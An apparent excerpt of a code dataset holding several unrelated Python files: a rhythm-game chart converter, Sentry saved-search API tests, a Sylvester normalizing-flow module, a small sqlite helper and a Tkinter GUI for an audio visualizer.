diff_rating = {\r\n 0: song_info['diffs']['single']['basic'],\r\n 1: song_info['diffs']['single']['trick'],\r\n 2: song_info['diffs']['single']['maniac'],\r\n 3: song_info['diffs']['couple']['basic'],\r\n 4: song_info['diffs']['couple']['trick'],\r\n 5: song_info['diffs']['couple']['maniac'],\r\n 7: song_info['diffs']['double']['basic'],\r\n 8: song_info['diffs']['double']['trick'],\r\n }[idx]\r\n\r\n chunks = [data[i:i+8] for i in range(0, len(data), 8)]\r\n events = []\r\n last_measure = 0\r\n\r\n for chunk in chunks:\r\n def get_arrows_str(n):\r\n s = \"\"\r\n s += \"1\" if (n & 8) else \"0\"\r\n s += \"1\" if (n & 4) else \"0\"\r\n s += \"1\" if (n & 2) else \"0\"\r\n s += \"1\" if (n & 1) else \"0\"\r\n return s\r\n\r\n measure = chunk[2]\r\n beat = chunk[3]\r\n cmd = int.from_bytes(chunk[4:], 'little')\r\n\r\n beat = round((beat / 256) * 192)\r\n\r\n event = {\r\n 'measure': measure,\r\n 'beat': beat,\r\n }\r\n\r\n if cmd == 4:\r\n # Is a note\r\n p1_note = chunk[0]\r\n p2_note = chunk[1]\r\n\r\n p1_str = get_arrows_str(p1_note)\r\n p2_str = get_arrows_str(p2_note)\r\n\r\n note_data = p1_str\r\n\r\n if chart_type == \"dance-single\":\r\n if p2_note != 0:\r\n print(\"P2 note has data for single chart\")\r\n # exit(1)\r\n\r\n else:\r\n note_data += p2_str\r\n\r\n event['cmd'] = 'note'\r\n event['data'] = note_data\r\n\r\n elif cmd == 0x100:\r\n # End song\r\n event['cmd'] = 'end'\r\n last_measure = measure + 1\r\n\r\n else:\r\n print(\"Unknown cmd value\", cmd)\r\n exit(1)\r\n\r\n events.append(event)\r\n\r\n if song_info is None:\r\n song_info = {}\r\n\r\n measure_data = {}\r\n for i in range(last_measure):\r\n measure_data[i] = []\r\n\r\n measure_data = {}\r\n for event in events:\r\n if event['cmd'] != \"note\":\r\n continue\r\n\r\n if event['measure'] not in measure_data:\r\n d = \"00000000\" if \"double\" in chart_type else \"0000\"\r\n measure_data[event['measure']] = [d] * 192\r\n\r\n # print(event['beat'], len(measure_data[event['measure']]))\r\n measure_data[event['measure']][event['beat']] = event['data']\r\n\r\n for i in range(last_measure):\r\n if i not in measure_data:\r\n d = \"00000000\" if \"double\" in chart_type else \"0000\"\r\n measure_data[i] = [d]\r\n\r\n arrow_data = \"\\n,\\n\".join([\"\\n\".join(measure_data[k]) for k in sorted(list(measure_data.keys()))])\r\n\r\n chart +=\"\"\"\r\n#NOTES:\r\n %s:\r\n :\r\n %s:\r\n %d:\r\n 0,0,0,0,0:\r\n%s\r\n;\"\"\" % (chart_type, chart_diff, diff_rating, arrow_data)\r\n\r\n return chart\r\n\r\n\r\n\r\nsonglist_info = {}\r\ndata = bytearray(open(\"dct.exe\", \"rb\").read())\r\n\r\nbase_diff = 0x8000f800\r\nsonglist_offset = 0x4d48\r\nsong_count = 0x340 // 0x40\r\n\r\nfor i in range(0, song_count * 0x40, 0x40):\r\n chunk = data[songlist_offset+i:songlist_offset+i+0x40]\r\n\r\n song_id = int.from_bytes(chunk[0x06:0x08], 'little')\r\n is_unlocked = chunk[0]\r\n unk_flag = chunk[1]\r\n timing_type = int.from_bytes(chunk[2:4], 'little')\r\n audio_idx = chunk[0x15]\r\n bpm = int.from_bytes(chunk[0x04:0x06], 'little')\r\n\r\n diffs = {\r\n 'single': {\r\n 'basic': int.from_bytes(chunk[0x24:0x24+2], 'little') / 2,\r\n 'trick': int.from_bytes(chunk[0x26:0x26+2], 'little') / 2,\r\n 'maniac': int.from_bytes(chunk[0x28:0x28+2], 'little') / 2,\r\n },\r\n 'double': {\r\n 'basic': int.from_bytes(chunk[0x34:0x34+2], 'little') / 2,\r\n 'trick': int.from_bytes(chunk[0x36:0x36+2], 'little') / 2,\r\n },\r\n 'couple': {\r\n 'basic': int.from_bytes(chunk[0x2c:0x2c+2], 'little') / 2,\r\n 'trick': int.from_bytes(chunk[0x2e:0x2e+2], 'little') / 2,\r\n 
'maniac': int.from_bytes(chunk[0x30:0x30+2], 'little') / 2,\r\n },\r\n }\r\n\r\n title_ptr = int.from_bytes(chunk[8:8+4], 'little') - base_diff\r\n title = read_string(data, title_ptr)\r\n\r\n artist_ptr = int.from_bytes(chunk[12:12+4], 'little') - base_diff\r\n artist = read_string(data, artist_ptr)\r\n\r\n image_ptr = int.from_bytes(chunk[16:16+4], 'little') - base_diff\r\n image = read_string(data, image_ptr)\r\n\r\n songlist_info[song_id] = {\r\n 'song_id': song_id,\r\n 'title': title,\r\n 'artist': artist,\r\n 'title_image': image,\r\n 'diffs': diffs,\r\n 'bpm': bpm,\r\n 'timing_type': timing_type,\r\n 'is_unlocked': is_unlocked,\r\n 'bgm_filename': \"D%04d.MP3\" % (audio_idx - 2),\r\n 'preview_filename': \"D%04d.MP3\" % (audio_idx - 28),\r\n }\r\n\r\n print(title)\r\n hexdump.hexdump(chunk)\r\n print()\r\n\r\n\r\nfor filename in glob.glob(\"raw_data_dct/seq*.bin\"):\r\n data = bytearray(open(filename, \"rb\").read())\r\n\r\n header = data[:0x78]\r\n data = data[0x78:]\r\n\r\n found_charts = []\r\n for i in range(0, len(header), 0x0c):\r\n idx = i // 0x0c\r\n exists = int.from_bytes(header[i:i+4], 'little')\r\n length = int.from_bytes(header[i+4:i+8], 'little') * 8\r\n offset = int.from_bytes(header[i+8:i+12], 'little') * 8\r\n\r\n if exists == 0:\r\n assert(length == 0 and offset == 0)\r\n continue\r\n\r\n # print(\"%d %d %04x %04x | %08x -> %08x (%08x)\" % (idx, exists, length, offset, offset, offset + length, len(data)))\r\n\r\n chart_data = data[offset:offset+length]\r\n found_charts.append((idx, chart_data))\r\n\r\n if len(found_charts) != 5:\r\n print(\"Found %d charts in %s\" % (len(found_charts), filename))\r\n\r\n basename = os.path.splitext(os.path.basename(filename))[0]\r\n song_id = int(basename[3:6], 10)\r\n\r\n song_info = songlist_info.get(song_id, None)\r\n if song_info is not None:\r\n basename = song_info['title']\r\n\r\n else:\r\n song_info = {\r\n 'title': \"Unknown\",\r\n 'song_id': song_id,\r\n 'bpm': 128,\r\n 'diffs': {\r\n 'single': {\r\n 'basic': 1,\r\n 'trick': 2,\r\n 'maniac': 3,\r\n },\r\n 'double': {\r\n 'basic': 1,\r\n 'trick': 2,\r\n },\r\n 'couple': {\r\n 'basic': 1,\r\n 'trick': 2,\r\n 'maniac': 3,\r\n },\r\n }\r\n }\r\n\r\n basepath = os.path.join(\"charts_output_dct\", basename)\r\n os.makedirs(basepath, exist_ok=True)\r\n\r\n for idx, chart in found_charts:\r\n chart_mapping = {\r\n 0: \"single_basic.bin\",\r\n 1: \"single_trick.bin\",\r\n 2: \"single_maniac.bin\",\r\n 3: \"couple_basic.bin\",\r\n 4: \"couple_trick.bin\",\r\n 5: \"couple_maniac.bin\",\r\n 7: \"double_basic.bin\",\r\n 8: \"double_trick.bin\",\r\n }\r\n\r\n chart_filename = chart_mapping.get(idx, \"%02d.bin\" % idx)\r\n\r\n if idx not in chart_mapping:\r\n print(\"Found unknown chart\", idx)\r\n\r\n # open(os.path.join(basepath, chart_filename), \"wb\").write(chart)\r\n\r\n # if \"night\" in song_info['title'].lower():\r\n try:\r\n chart_converted = convert_raw_chart(found_charts, song_info)\r\n open(os.path.join(basepath, \"chart.sm\"), \"w\").write(chart_converted)\r\n except:\r\n print(\"Couldn't convert %s\" % (filename))\r\n\r\n # if song_info is not None:\r\n # # json.dump(song_info, open(os.path.join(basepath, \"_metadata.json\"), \"w\"), indent=4)\r\n\r\n # if 'bgm_filename' in song_info:\r\n # shutil.copyfile(os.path.join(\"cd_data\", song_info['bgm_filename']), os.path.join(basepath, \"bgm.mp3\"))\r\n\r\n # if 'preview_filename' in song_info:\r\n # shutil.copyfile(os.path.join(\"cd_data\", song_info['preview_filename']), os.path.join(basepath, \"preview.mp3\"))\r\n\r\n # 
shutil.copyfile(filename, os.path.join(basepath, os.path.basename(filename)))\r\n\r\n","sub_path":"sys573/tools/parse_charts_dct.py","file_name":"parse_charts_dct.py","file_ext":"py","file_size_in_byte":11747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"35834586","text":"from __future__ import absolute_import\n\nfrom django.utils import timezone\nfrom exam import fixture\n\nfrom sentry.api.serializers import serialize\nfrom sentry.models import SavedSearch\nfrom sentry.models.savedsearch import DEFAULT_SAVED_SEARCHES\nfrom sentry.testutils import APITestCase\n\n\nclass OrganizationSearchesListTest(APITestCase):\n endpoint = 'sentry-api-0-organization-searches'\n\n @fixture\n def user(self):\n return self.create_user('test@test.com')\n\n def test_simple(self):\n self.login_as(user=self.user)\n team = self.create_team(members=[self.user])\n project1 = self.create_project(teams=[team], name='foo')\n project2 = self.create_project(teams=[team], name='bar')\n\n SavedSearch.objects.create(\n project=project1,\n name='bar',\n query=DEFAULT_SAVED_SEARCHES[0]['query'],\n )\n included = [\n SavedSearch.objects.create(\n name='Global Query',\n query=DEFAULT_SAVED_SEARCHES[0]['query'],\n is_global=True,\n date_added=timezone.now().replace(microsecond=0)\n ),\n SavedSearch.objects.create(\n project=project1,\n name='foo',\n query='some test',\n date_added=timezone.now().replace(microsecond=0)\n ),\n SavedSearch.objects.create(\n project=project1,\n name='wat',\n query='is:unassigned is:unresolved',\n date_added=timezone.now().replace(microsecond=0)\n ),\n SavedSearch.objects.create(\n project=project2,\n name='foo',\n query='some test',\n date_added=timezone.now().replace(microsecond=0)\n ),\n ]\n\n included.sort(key=lambda search: (search.name, search.id))\n response = self.get_valid_response(self.organization.slug)\n response.data.sort(key=lambda search: (search['name'], search['projectId']))\n assert response.data == serialize(included)\n\n\nclass OrgLevelOrganizationSearchesListTest(APITestCase):\n endpoint = 'sentry-api-0-organization-searches'\n\n @fixture\n def user(self):\n return self.create_user('test@test.com')\n\n def get_response(self, *args, **params):\n params['use_org_level'] = '1'\n return super(OrgLevelOrganizationSearchesListTest, self).get_response(\n *args,\n **params\n )\n\n def create_base_data(self):\n team = self.create_team(members=[self.user])\n SavedSearch.objects.create(\n project=self.create_project(teams=[team], name='foo'),\n name='foo',\n query='some test',\n date_added=timezone.now().replace(microsecond=0)\n )\n SavedSearch.objects.create(\n organization=self.organization,\n owner=self.create_user(),\n name='foo',\n query='some other user\\'s query',\n date_added=timezone.now().replace(microsecond=0)\n )\n included = [\n SavedSearch.objects.create(\n name='Global Query',\n query=DEFAULT_SAVED_SEARCHES[0]['query'],\n is_global=True,\n date_added=timezone.now().replace(microsecond=0)\n ),\n SavedSearch.objects.create(\n organization=self.organization,\n name='foo',\n query='some test',\n date_added=timezone.now().replace(microsecond=0)\n ),\n SavedSearch.objects.create(\n organization=self.organization,\n name='wat',\n query='is:unassigned is:unresolved',\n date_added=timezone.now().replace(microsecond=0)\n ),\n ]\n return included\n\n def check_results(self, expected):\n self.login_as(user=self.user)\n expected.sort(key=lambda search: (not search.is_pinned, search.name.lower()))\n response = 
self.get_valid_response(self.organization.slug)\n assert response.data == serialize(expected)\n\n def test_simple(self):\n included = self.create_base_data()\n self.check_results(included)\n\n def test_pinned(self):\n included = self.create_base_data()\n pinned_query = SavedSearch.objects.create(\n organization=self.organization,\n owner=self.user,\n name='My Pinned Query',\n query='pinned junk',\n date_added=timezone.now().replace(microsecond=0)\n )\n included.append(pinned_query)\n self.check_results(included)\n # Check a pinned query that uses an existing query correctly filters\n # the existing query\n to_be_pinned = included.pop()\n to_be_pinned.is_pinned = True\n pinned_query.query = to_be_pinned.query\n pinned_query.save()\n included[0] = to_be_pinned\n self.check_results(included)\n","sub_path":"tests/sentry/api/endpoints/test_organization_searches.py","file_name":"test_organization_searches.py","file_ext":"py","file_size_in_byte":4988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"24579028","text":"\n\nfrom xai.brain.wordbase.nouns._madman import _MADMAN\n\n# class header\nclass _MADMEN(_MADMAN):\n\tdef __init__(self):\n\t\t_MADMAN.__init__(self)\n\t\tself.name = \"MADMEN\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"madman\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_madmen.py","file_name":"_madmen.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"169625865","text":"#!/usr/bin/env python3\n\nimport torch.nn as nn\nimport torch\nimport torch.nn.functional as F\nimport numpy as np\n\nclass Sylvester(nn.Module):\n \"\"\"\n Sylvester normalizing flow.\n \"\"\"\n\n def __init__(self, num_ortho_vecs):\n\n super(Sylvester, self).__init__()\n\n self.num_ortho_vecs = num_ortho_vecs\n\n self.h = nn.Tanh()\n\n triu_mask = torch.triu(torch.ones(num_ortho_vecs, num_ortho_vecs), diagonal=1).unsqueeze(0)\n diag_idx = torch.arange(0, num_ortho_vecs).long()\n\n self.register_buffer('triu_mask', torch.Tensor(triu_mask))\n self.triu_mask.requires_grad = False\n self.register_buffer('diag_idx', diag_idx)\n\n def der_h(self, x):\n return self.der_tanh(x)\n\n def der_tanh(self, x):\n return 1 - self.h(x) ** 2\n\n def _forward(self, zk, r1, r2, q_ortho, b, sum_ldj=True):\n \"\"\"\n All flow parameters are amortized. Conditions on diagonals of R1 and R2 for invertibility need to be satisfied\n outside of this function. 
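        (For the tanh nonlinearity used here, a sufficient condition is r1[i, i] * r2[i, i] > -1 for every
        diagonal entry: since 0 < tanh'(x) <= 1, this keeps each diagonal term of the Jacobian positive.)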
Computes the following transformation:\n z' = z + QR1 h( R2Q^T z + b)\n or actually\n z'^T = z^T + h(z^T Q R2^T + b^T)R1^T Q^T\n :param zk: shape: (batch_size, z_size)\n :param r1: shape: (batch_size, num_ortho_vecs, num_ortho_vecs)\n :param r2: shape: (batch_size, num_ortho_vecs, num_ortho_vecs)\n :param q_ortho: shape (batch_size, z_size , num_ortho_vecs)\n :param b: shape: (batch_size, 1, self.z_size)\n :return: z, log_det_j\n \"\"\"\n\n # Amortized flow parameters\n zk = zk.unsqueeze(1)\n\n # Save diagonals for log_det_j\n diag_r1 = r1[:, self.diag_idx, self.diag_idx]\n diag_r2 = r2[:, self.diag_idx, self.diag_idx]\n\n r1_hat = r1\n r2_hat = r2\n\n qr2 = torch.bmm(q_ortho, r2_hat.transpose(2, 1))\n qr1 = torch.bmm(q_ortho, r1_hat)\n\n r2qzb = torch.bmm(zk, qr2) + b\n z = torch.bmm(self.h(r2qzb), qr1.transpose(2, 1)) + zk\n z = z.squeeze(1)\n\n # Compute log|det J|\n # Output log_det_j in shape (batch_size) instead of (batch_size,1)\n diag_j = diag_r1 * diag_r2\n diag_j = self.der_h(r2qzb).squeeze(1) * diag_j\n diag_j += 1.\n log_diag_j = diag_j.abs().log()\n\n if sum_ldj:\n log_det_j = log_diag_j.sum(-1)\n else:\n log_det_j = log_diag_j\n\n return z, log_det_j\n\n def forward(self, zk, r1, r2, q_ortho, b, sum_ldj=True):\n\n return self._forward(zk, r1, r2, q_ortho, b, sum_ldj)\n\n","sub_path":"lib_snf/flow.py","file_name":"flow.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"109244824","text":"import sqlite3\n\n\nclass DbConnect():\n def __init__(self):\n self.conn = sqlite3.connect('db.sqlite3')\n\n def insertNotifications(self,username,stock,action):\n cur = self.conn.cursor()\n cur.execute(\n 'INSERT INTO myapp_notificationType (username,stock, notificationType) values (?, ?, ?)',\n (username, stock, action))\n self.conn.commit()\n self.conn.close()","sub_path":"myapp/database_connections/db_connections.py","file_name":"db_connections.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"523163995","text":"from FanBlender import FanBlender, __version__\nfrom FanTkImageViewer import ImageViewer\nfrom LanguagePack import *\n\nimport threading, os, pickle, ctypes\nimport tkinter as tk\nfrom tkinter import ttk\nimport tkinter.messagebox\nfrom tkinter.filedialog import askopenfilename\nfrom tkinter.filedialog import askdirectory\nfrom tkinter import scrolledtext\n\n\"\"\"\nAudio Visualizer - GUI\nBy Twitter @FanKetchup\nhttps://github.com/FerryYoungFan/FanselineVisualizer\n\"\"\"\n\n# GUI Language\nlang = lang_en\nlang_code = \"en\"\n\n\n# lang = lang_cn_s\n\ndef clog(content=\"\", insertloc='end'):\n global scr\n scr.configure(state='normal')\n scr.insert(insertloc, content)\n scr.configure(state='disable')\n scr.see(\"end\")\n\n\ndef clearLog():\n global scr\n scr.configure(state='normal')\n scr.delete('1.0', tk.END)\n clog(\"*\" * 35 + \" \" + lang[\"Welcome to use\"] + \" \" + lang[\"Fanseline Audio Visualizer\"] + \"!\" \\\n + \" \" + \"*\" * 35 + \"\\n\\n\")\n clog(lang[\"Project Website: \"] + \"https://github.com/FerryYoungFan/FanselineVisualizer\" + \"\\n\\n\")\n\n\nclass InfoBridge:\n def __init__(self):\n pass\n\n def log(self, content=\"\"):\n clog(content + \"\\n\")\n\n def progressbar(self, value, total):\n global progress\n progress[\"value\"] = (100 * value / total)\n\n def freeze(self, flag=True):\n global isRunning\n if flag:\n fg = \"disabled\"\n self.progressbar(0, 100)\n 
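            # Freezing disables every input widget collected in `elem` below so the
            # parameters cannot change while a blend is running; freeze(False) re-enables them.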
btn_blend[\"text\"] = lang[\"Stop Blending\"]\n isRunning = True\n root.title(lang[\"Fanseline Audio Visualizer\"] + \" -V.\" + __version__ + \" \" + lang[\"(Running)\"])\n else:\n fg = \"normal\"\n self.progressbar(0, 100)\n btn_blend[\"text\"] = lang[\"Blend & Export\"]\n isRunning = False\n root.title(lang[\"Fanseline Audio Visualizer\"] + \" -V.\" + __version__)\n elem = [entry_audio, btn_audio, entry_fname, btn_output, entry_img, btn_img, entry_logo, btn_logo,\n entry_text, entry_font, btn_font, entry_width, entry_height, entry_fps, entry_brv, btn_autob,\n entry_low, entry_up, entry_bins, entry_scalar, list_color, list_bra, check_normal, list_preseta,\n list_presetv, entry_output, label_mp4, label_textplz, label_font, label_size, label_mul,\n label_fps, label_brv, label_range, label_to, label_hz, label_bins, label_scalar, label_color,\n label_bra, label_kbps, label_preseta, label_presetv, list_lang, label_lang, label_smooth, list_smooth,\n entry_bg, btn_bg, entry_relsize, check_use_glow, label_bright, entry_bright, label_bg_mode,\n list_bg_mode, label_style, list_style, label_linewidth, entry_linewidth, entry_rotate, label_rotate,\n label_saturation, entry_saturation, label_text_brt, entry_text_brt]\n for el in elem:\n el[\"state\"] = fg\n\n if not flag:\n list_color[\"state\"] = \"readonly\"\n list_preseta[\"state\"] = \"readonly\"\n list_presetv[\"state\"] = \"readonly\"\n list_lang[\"state\"] = \"readonly\"\n list_bg_mode[\"state\"] = \"readonly\"\n list_style[\"state\"] = \"readonly\"\n root_view.withdraw()\n\n def realTime(self, img):\n global frame2\n if frame2.winfo_viewable():\n frame2.imshow(img)\n\n\nimg_format_dict = \"*.jpg *.jpeg *.png *.gif *.bmp *.ico *.dib *.webp *.tiff *.tga\"\n\n\ndef selectImage():\n try:\n global tk_image_path\n pathread = askopenfilename(\n filetypes=[(lang[\"Image files\"], img_format_dict), (lang[\"All files\"], \"*.*\")])\n if not pathread or not os.path.exists(pathread):\n return\n else:\n tk_image_path.set(pathread)\n entry_img.xview(\"end\")\n clog(lang[\"Foreground Selected: \"])\n clog(pathread + '\\n')\n fastPreview()\n except:\n return\n\n\ndef selectLogo():\n try:\n global tk_logo_path\n pathread = askopenfilename(\n filetypes=[(lang[\"Image files\"], img_format_dict), (lang[\"All files\"], \"*.*\")])\n if not pathread or not os.path.exists(pathread):\n return\n else:\n tk_logo_path.set(pathread)\n entry_logo.xview(\"end\")\n clog(lang[\"Logo Selected: \"])\n clog(pathread + '\\n')\n fastPreview()\n except:\n return\n\n\ndef selectBG():\n try:\n global tk_bg_path\n pathread = askopenfilename(\n filetypes=[(lang[\"Image files\"], img_format_dict), (lang[\"All files\"], \"*.*\")])\n if not pathread or not os.path.exists(pathread):\n return\n else:\n tk_bg_path.set(pathread)\n entry_bg.xview(\"end\")\n clog(lang[\"Background Selected: \"])\n clog(pathread + '\\n')\n fastPreview()\n except:\n return\n\n\ndef selectAudio():\n try:\n global tk_sound_path, tk_output_path, tk_filename\n pathread = askopenfilename(\n filetypes=[(lang[\"Audio files\"], \"*.mp3 *.wav *.ogg *.aac *.flac *.ape *.m4a *.m4r *.wma *.mp2 *.mmf\"),\n (lang[\"Video files\"], \"*.mp4 *.wmv *.avi *.flv *.mov *.mkv *.rm *.rmvb\"),\n (lang[\"All files\"], \"*.*\")])\n if not pathread or not os.path.exists(pathread):\n return\n else:\n tk_sound_path.set(pathread)\n entry_audio.xview(\"end\")\n vdic = getAllValues()\n if vdic[\"output_path\"] is None:\n tk_output_path.set(os.path.dirname(os.path.realpath(pathread)).replace(\"\\\\\", \"/\") + \"/\")\n 
entry_output.xview(\"end\")\n new_name = (os.path.splitext(pathread)[0].split(\"/\")[-1]) + lang[\"_Visualize\"]\n tk_filename.set(new_name)\n entry_fname.xview(\"end\")\n clog(lang[\"Audio Selected: \"])\n clog(tk_sound_path.get() + '\\n')\n except:\n return\n\n\ndef selectOutput():\n try:\n global tk_output_path\n pathexport = askdirectory()\n pathexport = pathexport + '/'\n if not pathexport or pathexport == \"/\":\n return\n else:\n tk_output_path.set(pathexport)\n entry_output.xview(\"end\")\n clog(lang[\"Output Path Selected: \"])\n clog(tk_output_path.get() + '\\n')\n except:\n return\n\n\ndef selectFont():\n global tk_font, tk_text\n try:\n pathread = askopenfilename(filetypes=[(lang[\"Font files\"], \"*.ttf *.otf\"), (lang[\"All files\"], \"*.*\")])\n if not pathread:\n return\n else:\n tk_font.set(pathread)\n entry_font.xview(\"end\")\n clog(lang[\"Font Selected: \"])\n clog(pathread + '\\n')\n fastPreview()\n except:\n return\n\n\ndef getAllValues():\n global tk_image_path, tk_sound_path, tk_logo_path, tk_output_path, tk_filename, \\\n tk_text, tk_font, tk_bins, tk_fq_low, tk_fq_high, color_dic, list_color, tk_scalar, \\\n tk_width, tk_height, tk_fps, tk_br_video, tk_br_audio, tk_audio_normal, tk_smooth, \\\n tk_bg_path, tk_bright, tk_blur_bg, tk_use_glow, tk_relsize, tk_bg_mode, bg_mode_dic, \\\n tk_style, tk_linewidth, style_dic, tk_rotate, tk_saturation, tk_text_brt\n\n def checkStr(strtk):\n if strtk.get():\n return strtk.get()\n else:\n return None\n\n def checkFile(strtk):\n path = checkStr(strtk)\n if path is not None:\n if os.path.exists(path):\n return path\n return None\n\n def checkInt(inttk):\n\n try:\n num = float(inttk.get())\n except:\n return None\n else:\n return int(round(num))\n\n def checkFloat(floattk):\n try:\n num = float(floattk.get())\n except:\n return None\n else:\n return num\n\n if checkStr(tk_filename) is not None:\n fname = checkStr(tk_filename) + \".mp4\"\n else:\n fname = None\n\n param_dict = {\n \"image_path\": checkFile(tk_image_path),\n \"bg_path\": checkFile(tk_bg_path),\n \"sound_path\": checkFile(tk_sound_path),\n \"logo_path\": checkFile(tk_logo_path),\n \"output_path\": checkStr(tk_output_path),\n \"filename\": fname,\n \"text\": checkStr(tk_text),\n \"font\": checkStr(tk_font),\n \"text_brt\": checkFloat(tk_text_brt),\n\n \"bins\": checkInt(tk_bins),\n \"lower\": checkInt(tk_fq_low),\n \"upper\": checkInt(tk_fq_high),\n \"color\": color_dic[checkStr(list_color)],\n \"scalar\": checkFloat(tk_scalar),\n \"smooth\": checkInt(tk_smooth),\n \"bright\": checkFloat(tk_bright),\n \"saturation\": checkFloat(tk_saturation),\n\n \"blur_bg\": bg_mode_dic[checkStr(tk_bg_mode)][0],\n \"bg_mode\": bg_mode_dic[checkStr(tk_bg_mode)][1],\n \"use_glow\": tk_use_glow.get(),\n \"relsize\": checkFloat(tk_relsize),\n\n \"width\": checkInt(tk_width),\n \"height\": checkInt(tk_height),\n \"fps\": checkFloat(tk_fps),\n \"br_Mbps\": checkFloat(tk_br_video),\n\n \"normal\": tk_audio_normal.get(),\n \"br_kbps\": checkInt(tk_br_audio),\n\n \"style\": style_dic[checkStr(tk_style)],\n \"linewidth\": checkFloat(tk_linewidth),\n \"rotate\": checkFloat(tk_rotate),\n\n }\n return param_dict\n\n\ndef dict2tuple(dict_input):\n keys = []\n for key in dict_input.keys():\n keys.append(key)\n return tuple(keys)\n\n\ndef autoBitrate():\n vdic = getAllValues()\n global tk_br_video\n if vdic[\"width\"] is not None and vdic[\"height\"] is not None and vdic[\"fps\"] is not None:\n brv = getDefaultBR(vdic[\"width\"], vdic[\"height\"], vdic[\"fps\"], 4)\n tk_br_video.set(round(brv * 
100) / 100)\n\n\ndef setBlender(param_dict):\n global fb\n fb.setConsole(InfoBridge())\n fb.setFilePath(image_path=param_dict[\"image_path\"],\n bg_path=param_dict[\"bg_path\"],\n sound_path=param_dict[\"sound_path\"],\n logo_path=param_dict[\"logo_path\"])\n fb.setOutputPath(output_path=param_dict[\"output_path\"],\n filename=param_dict[\"filename\"])\n fb.setText(text=param_dict[\"text\"], font=param_dict[\"font\"],\n relsize=param_dict[\"relsize\"], text_brt=param_dict[\"text_brt\"])\n fb.setSpec(bins=param_dict[\"bins\"], lower=param_dict[\"lower\"], upper=param_dict[\"upper\"],\n color=param_dict[\"color\"], bright=param_dict[\"bright\"], saturation=param_dict[\"saturation\"],\n scalar=param_dict[\"scalar\"], smooth=param_dict[\"smooth\"],\n style=param_dict[\"style\"], linewidth=param_dict[\"linewidth\"])\n fb.setVideoInfo(width=param_dict[\"width\"], height=param_dict[\"height\"],\n fps=param_dict[\"fps\"], br_Mbps=param_dict[\"br_Mbps\"],\n blur_bg=param_dict[\"blur_bg\"], use_glow=param_dict[\"use_glow\"],\n bg_mode=param_dict[\"bg_mode\"], rotate=param_dict[\"rotate\"])\n fb.setAudioInfo(normal=param_dict[\"normal\"], br_kbps=param_dict[\"br_kbps\"])\n\n\ndef getDefaultBR(width, height, fps, quality=3):\n if quality == 5:\n return 20 * (width * height * fps) / (1920 * 1080 * 30)\n elif quality == 4:\n return 12 * (width * height * fps) / (1920 * 1080 * 30)\n elif quality == 3:\n return 7 * (width * height * fps) / (1920 * 1080 * 30)\n elif quality == 2:\n return 2 * (width * height * fps) / (1920 * 1080 * 30)\n elif quality == 1:\n return (width * height * fps) / (1920 * 1080 * 30)\n elif quality == 0:\n return 0.5 * (width * height * fps) / (1920 * 1080 * 30)\n else:\n return 12 * (width * height * fps) / (1920 * 1080 * 30)\n\n\ndef showPreview():\n global fb\n if not isRunning:\n saveConfig()\n setBlender(getAllValues())\n\n def _showPreview():\n global frame2, root_view\n frame2.imshow(fb.previewBackground())\n if not frame2.winfo_viewable():\n root_view.deiconify()\n\n th_preview = threading.Thread(target=_showPreview)\n th_preview.setDaemon(True)\n th_preview.start()\n else:\n global root_view\n if not root_view.winfo_viewable():\n root_view.deiconify()\n\n\ndef startBlending():\n global fb\n vdic = getAllValues()\n if vdic[\"sound_path\"] is None:\n tkinter.messagebox.showinfo(lang[\"Cannot Blend\"], lang[\"Please select the correct audio file!\"])\n return\n if vdic[\"output_path\"] is None:\n tkinter.messagebox.showinfo(lang[\"Cannot Blend\"], lang[\"Please select the correct output path!\"])\n return\n if vdic[\"filename\"] is None:\n tkinter.messagebox.showinfo(lang[\"Cannot Blend\"], lang[\"Please input the corrent file name!\"])\n return\n\n if not isRunning:\n setBlender(vdic)\n if os.path.exists(fb.getOutputPath()):\n MsgBox = tk.messagebox.askquestion(lang[\"Notice\"], lang[\"Are you sure to overwrite this file?\"])\n if MsgBox == 'yes':\n pass\n else:\n return\n showPreview()\n clearLog()\n saveConfig()\n th_blend = threading.Thread(target=fb.runBlending)\n th_blend.setDaemon(True)\n th_blend.start()\n else:\n MsgBox = tk.messagebox.askquestion(lang[\"Notice\"], lang[\"Are you sure to stop blending?\"])\n if MsgBox == 'yes':\n pass\n else:\n return\n clog(lang[\"Stop Blending...\"] + \"\\n\")\n fb.isRunning = False\n\n\ndef presetVideo(*args):\n global video_dic, list_presetv, tk_width, tk_height, tk_fps, tk_br_video\n w, h, fps, brv = video_dic[list_presetv.get()]\n tk_width.set(w)\n tk_height.set(h)\n tk_fps.set(fps)\n tk_br_video.set(round(brv * 100) / 100)\n 
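# NOTE (editor-added worked example, assumes getDefaultBR above is in scope):
# the function scales a per-quality reference bitrate for 1920x1080 @ 30 fps by
# the pixel-rate ratio. For 1280x720 @ 30 fps at quality 4:
#   12 * (1280*720*30) / (1920*1080*30) = 12 * 921600/2073600 ≈ 5.33 Mbps
print(round(getDefaultBR(1280, 720, 30, 4), 2))   # 5.33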
fastPreview()\n\n\ndef presetAudio(*args):\n global audio_dic, tk_br_audio, tk_fq_low, tk_fq_high, tk_audio_normal, tk_scalar, tk_smooth\n bra, low, up, normal, scale, smooth = audio_dic[list_preseta.get()]\n tk_br_audio.set(bra)\n tk_fq_low.set(low)\n tk_fq_high.set(up)\n tk_audio_normal.set(normal)\n tk_scalar.set(scale)\n tk_smooth.set(smooth)\n\n\ndef saveConfig():\n vdic = getAllValues()\n try:\n directory = os.path.dirname(\"./Source/\")\n if not os.path.exists(directory):\n os.makedirs(directory)\n with open('./Source/config.pickle', 'wb') as handle:\n pickle.dump(vdic, handle, protocol=pickle.HIGHEST_PROTOCOL)\n except:\n clog(lang[\"Error! Cannot save config!\"])\n\n\ndef loadConfig():\n try:\n with open('./Source/config.pickle', 'rb') as handle:\n vdic = pickle.load(handle)\n except:\n print(\"No config\")\n saveConfig()\n return\n\n global tk_image_path, tk_sound_path, tk_logo_path, tk_output_path, tk_filename, \\\n tk_text, tk_font, tk_bins, tk_fq_low, 